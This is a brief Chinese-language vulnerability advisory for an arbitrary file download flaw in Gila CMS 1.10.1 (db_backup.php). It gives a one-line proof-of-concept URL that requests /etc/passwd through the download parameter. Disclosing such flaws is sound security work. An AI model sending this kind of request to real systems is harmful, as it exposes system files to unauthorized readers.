Gila CMS 1.10.1 任意文件下载漏洞
一、漏洞摘要 漏洞名称: Gila CMS 1.10.1 任意文件下载漏洞 上报日期: 2019-04-24 漏洞发现者: topsec_lizhongcheng 产品首页: https://gilacms.com 版本: V1.10.1 二、漏洞概述 普通用户在下载文件时没有对路径进行过滤,导致可以下载系统文件,造成信息泄露 文件: /src/core/classes/db_backup.php poc: http://192.168.1.112/gila-1.10.1/admin/db_backup?download=/etc/passwd